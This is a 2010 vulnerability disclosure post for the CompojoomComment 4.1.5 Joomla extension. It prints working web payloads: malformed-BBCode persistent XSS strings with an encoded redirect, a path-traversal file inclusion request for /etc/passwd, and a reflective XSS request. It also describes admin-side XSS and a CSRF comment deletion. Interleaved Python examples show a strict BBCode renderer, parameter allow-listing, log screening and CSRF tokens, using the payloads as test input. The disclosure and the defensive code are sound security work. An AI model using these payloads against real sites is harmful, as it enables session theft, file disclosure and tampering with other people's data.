Wednesday, 01 September 2010 15:48

Since the CompojoomComment Hacking Contest is now over, and I was the only winner, I figured I'd go ahead and share my winning entries. These vulnerabilities are present in CompojoomComment 4.1.5, and are all patched in the latest (4.1.7 at the time of this writing).

Malformed BBCode Persistent XSS, #1

a[img]b[img]c[/img]d[/img]e
a[url=http://jeffchannell.com]b[img]c=''/style='position:absolute;top:-1px;left:-1px;width:999em;height:999em'/onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)'/[/url]d[/img]e

Malformed BBCode Persistent XSS, #2

[url=a]b'c='[img][/url]d[color=red]e[/img] onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)' style='position:absolute;top:1px;left:1px;width:999em;height:999em' [/color]
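Both payloads above work by getting the BBCode-to-HTML step to splice user text into an attribute of a tag that a different, overlapping tag opened. The renderer below is an added example (my own code for illustration, not CompojoomComment's, and not the post author's) of the discipline that defeats that: every tag argument is checked against an allow-list before it is emitted, a tag that does not parse cleanly is shown as literal text, and all literal text is HTML-escaped with quotes included. The supported tag set and the HTML it emits are assumptions; the two malformed strings above are reused unchanged as test input.

```python
import html
import re

# Added example (not CompojoomComment's own code): a strict BBCode renderer in which
# tag arguments are validated against allow-lists and everything else is HTML-escaped,
# so a malformed or nested tag can never splice attacker text into an attribute.

URL_RE = re.compile(r"^https?://[A-Za-z0-9._~:/?#@!$&*+,;=%()-]+$")  # no quotes, spaces, < or >
COLOR_RE = re.compile(r"^(?:[A-Za-z]{1,20}|#[0-9A-Fa-f]{3}|#[0-9A-Fa-f]{6})$")
TAG_RE = re.compile(r"\[(/?)([a-z]+)(?:=([^\]]*))?\]")
INLINE = {"b": "strong", "i": "em"}  # argument-less tags and the element each becomes


def esc(s):
    return html.escape(s, quote=True)  # also turns ' into &#x27; and " into &quot;


def tokenize(src):
    """Split source into ("text", s, None, s) and ("open"/"close", name, arg, raw) tokens."""
    tokens, pos = [], 0
    for m in TAG_RE.finditer(src):
        if m.start() > pos:
            tokens.append(("text", src[pos:m.start()], None, src[pos:m.start()]))
        kind = "close" if m.group(1) else "open"
        tokens.append((kind, m.group(2), m.group(3), m.group(0)))
        pos = m.end()
    if pos < len(src):
        tokens.append(("text", src[pos:], None, src[pos:]))
    return tokens


def _parse(tokens, i, closing):
    """Render tokens[i:] until the close tag `closing`; returns (html, next_index, closed)."""
    out = []
    while i < len(tokens):
        kind, name, arg, raw = tokens[i]
        if kind == "text":
            out.append(esc(name)); i += 1
        elif kind == "close":
            if name == closing:
                return "".join(out), i + 1, True
            out.append(esc(raw)); i += 1  # stray close tag: literal text
        elif name == "img":
            # body must be exactly one text token holding an http(s) URL, then [/img]
            ok = (i + 2 < len(tokens) and tokens[i + 1][0] == "text"
                  and tokens[i + 2][:2] == ("close", "img") and URL_RE.match(tokens[i + 1][1]))
            if ok:
                out.append('<img src="%s" alt="">' % esc(tokens[i + 1][1])); i += 3
            else:
                out.append(esc(raw)); i += 1  # nested tag or non-URL body: literal text
        elif name in ("url", "color") or name in INLINE:
            valid = bool((name == "url" and arg is not None and URL_RE.match(arg)) or
                         (name == "color" and arg is not None and COLOR_RE.match(arg)) or
                         (name in INLINE and arg is None))
            inner, j, closed = _parse(tokens, i + 1, name)  # children are already safe HTML
            if valid and closed:
                if name == "url":
                    out.append('<a href="%s" rel="nofollow">%s</a>' % (esc(arg), inner))
                elif name == "color":
                    out.append('<span style="color:%s">%s</span>' % (esc(arg), inner))
                else:
                    out.append("<%s>%s</%s>" % (INLINE[name], inner, INLINE[name]))
            else:
                # bad argument or unbalanced: show the tag(s) as text, keep the rendered children
                out.append(esc(raw) + inner + (esc(tokens[j - 1][3]) if closed else ""))
            i = j
        else:
            out.append(esc(raw)); i += 1  # unknown tag: literal text
    return "".join(out), i, False


def render_bbcode(src):
    return _parse(tokenize(src), 0, None)[0]


def is_inert(rendered):
    """True when no single-quoted event handler / style attribute or script survived rendering."""
    return "onmouseover='" not in rendered and "style='" not in rendered and "<script" not in rendered


# The malformed-BBCode strings from this advisory, reused here as test input.
PAYLOADS = (
    "a[img]b[img]c[/img]d[/img]e",
    "a[url=http://jeffchannell.com]b[img]c=''/style='position:absolute;top:-1px;left:-1px;width:999em;height:999em'/onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)'/[/url]d[/img]e",
    "[url=a]b'c='[img][/url]d[color=red]e[/img] onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)' style='position:absolute;top:1px;left:1px;width:999em;height:999em' [/color]",
)

if __name__ == "__main__":
    for p in PAYLOADS:
        print(is_inert(render_bbcode(p)), render_bbcode(p))
```

The important design choice is that an `[img]` body is accepted only when it is a single run of plain text that matches the URL allow-list; any tag inside it, or any quote or whitespace, turns the whole `[img]` back into literal text instead of into an attribute value, which is exactly the context the payloads above rely on.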

Local File Inclusion

?option=com_comment
&no_html=1
&component=../../../../../../../../../../../../etc/passwd%00
&joscsectionid=0
&josctask=ajax_search
&comment_id=0
&content_id=999
&search_keyword=a
&search_phrase=any

Reflective XSS

?option=com_comment
&no_html=1
&component=<script>alert(document.cookie);</script>
&joscsectionid=0
&josctask=ajax_search
&comment_id=0
&content_id=999
&search_keyword=a
&search_phrase=any
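Both of the requests above abuse the same `component` parameter: once as a file path (traversal plus a `%00` to cut off whatever extension the code appends) and once as text echoed straight back into the page. The following is an added example, written for this page rather than taken from CompojoomComment, of treating that parameter as a component name rather than a path: it is matched against an allow-list pattern before any file is opened, the resolved path is confirmed to sit under the component directory, and the same check is run over access-log lines so the two requests above can be spotted after the fact. The `com_<name>/<name>.php` layout and the log lines are constructed assumptions.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Added example (not CompojoomComment's own code). The `component` parameter is an
# include-path fragment, so it is checked against an allow-list before any file is opened,
# and access-log lines are screened for the traversal / script patterns in the advisory.

COMPONENT_RE = re.compile(r"^com_[a-z0-9_]{1,40}$")  # Joomla component names look like com_content


def check_component(value):
    """Return None if the value is an acceptable component name, else a short reason."""
    if "\x00" in value:
        return "null byte"
    if "../" in value or "..\\" in value:
        return "path traversal"
    if "<" in value or ">" in value:
        return "html markup"
    if not COMPONENT_RE.fullmatch(value):
        return "not allowlisted"
    return None


def resolve_component(value, base_dir):
    """Map a validated component name to its file, refusing anything outside base_dir.
    The <base>/<name>/<name>.php layout is an assumption made for this example."""
    reason = check_component(value)
    if reason:
        raise ValueError("rejected component parameter: " + reason)
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, value, value + ".php"))
    if os.path.commonpath([base, path]) != base:  # belt and braces after the allow-list
        raise ValueError("component path escapes base directory")
    return path


REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_suspicious_requests(log_lines):
    """Return (index, reason) for every line whose `component` parameter fails validation."""
    flagged = []
    for idx, line in enumerate(log_lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for value in params.get("component", []):  # parse_qs already %-decodes, including %00
            reason = check_component(value)
            if reason:
                flagged.append((idx, reason))
    return flagged


# Constructed access-log lines (documentation IP range), modelled on the requests above.
LOG_LINES = [
    '203.0.113.5 - - [01/Sep/2010:15:48:00 +0000] "GET /index.php?option=com_comment&no_html=1'
    '&component=com_content&josctask=ajax_search HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Sep/2010:15:49:10 +0000] "GET /index.php?option=com_comment&no_html=1'
    '&component=../../../../../../../../../../../../etc/passwd%00&joscsectionid=0&josctask=ajax_search HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Sep/2010:15:50:30 +0000] "GET /index.php?option=com_comment&no_html=1'
    '&component=%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E&josctask=ajax_search HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for idx, reason in flag_suspicious_requests(LOG_LINES):
        print("line %d: %s" % (idx, reason))
    print(resolve_component("com_content", "components"))
```

The allow-list alone closes both issues, since neither `../` nor `<` can appear in a name that matches it; the path-containment check is kept so the function stays safe even if someone later loosens the pattern.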

Administrator Persistent XSS

The Name and Title inputs in the comment edit form aren't sanitized: a double quote in either field allows XSS in the administrator backend if an admin edits that comment.

Comment Deletion CSRF

Embedding the "delete comment" URL in an [img] BBCode would result in comment deletion if an authorized admin loaded the page.
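The two administrator-side issues above (a double quote breaking out of the Name/Title `value="..."` attributes, and a delete that fires on a plain GET) have the two standard fixes shown in this added example, which is illustration code written for this page and not CompojoomComment's: the edit form escapes attribute values with quotes included, and deletion is only honoured on a POST that carries a per-session CSRF token, so a URL planted in an `[img]` tag never reaches the delete code. The request/session shapes, the form markup and the sample comment are assumptions.

```python
import hmac
import html
import secrets

# Added example (not CompojoomComment's own code): attribute-escape comment fields in the
# admin edit form, and make deletion a POST that must carry a per-session CSRF token.


def render_edit_form(comment):
    """Name/Title go into value="..." attributes; quote=True turns " into &quot;."""
    return ('<input type="text" name="name" value="%s">\n'
            '<input type="text" name="title" value="%s">'
            % (html.escape(comment["name"], quote=True), html.escape(comment["title"], quote=True)))


class AdminSession:
    def __init__(self):
        self.csrf_token = secrets.token_hex(16)  # generated once per login, kept server-side


def delete_form(session, comment_id):
    """The only delete control the admin UI emits: a form that POSTs the session token."""
    return ('<form method="post" action="/administrator/index.php">'
            '<input type="hidden" name="task" value="delete">'
            '<input type="hidden" name="id" value="%s">'
            '<input type="hidden" name="token" value="%s">'
            '<button>Delete</button></form>'
            % (html.escape(str(comment_id), quote=True), session.csrf_token))


def handle_delete(request, session, comments):
    """request = {"method": ..., "params": {...}}; returns (status, message)."""
    if request["method"] != "POST":
        return 405, "delete requires POST"  # an <img src=...> fetch is a GET and stops here
    token = request["params"].get("token", "")
    # constant-time compare on bytes so a non-ASCII token cannot raise instead of failing
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return 403, "missing or invalid CSRF token"
    cid = request["params"].get("id")
    if cid not in comments:
        return 404, "no such comment"
    del comments[cid]
    return 200, "deleted"


def demo():
    """Walk through the three cases on a constructed comment; returns the outcomes."""
    session = AdminSession()
    comments = {"42": {"name": 'x" data-injected="1', "title": "hello"}}  # constructed sample
    form = render_edit_form(comments["42"])
    img_get = handle_delete({"method": "GET", "params": {"task": "delete", "id": "42"}}, session, comments)
    post_no_token = handle_delete({"method": "POST", "params": {"id": "42"}}, session, comments)
    post_ok = handle_delete({"method": "POST", "params": {"id": "42", "token": session.csrf_token}},
                            session, comments)
    return form, img_get, post_no_token, post_ok, comments


if __name__ == "__main__":
    for item in demo():
        print(item)
```

Requiring POST on its own is not enough (a form on a third-party page can still POST), which is why the token check is the real control; the method check just makes sure the `[img]` vector cannot even reach it.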

Timeline

  • Vulnerabilities Discovered: 4-9 August 2010
  • Vendor Notified: 4-9 August 2010
  • Vendor Response: 4-9 August 2010
  • Update Available: 9 August 2010
  • Disclosure: 1 September 2010
Last Updated on Thursday, 30 September 2010 17:34

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
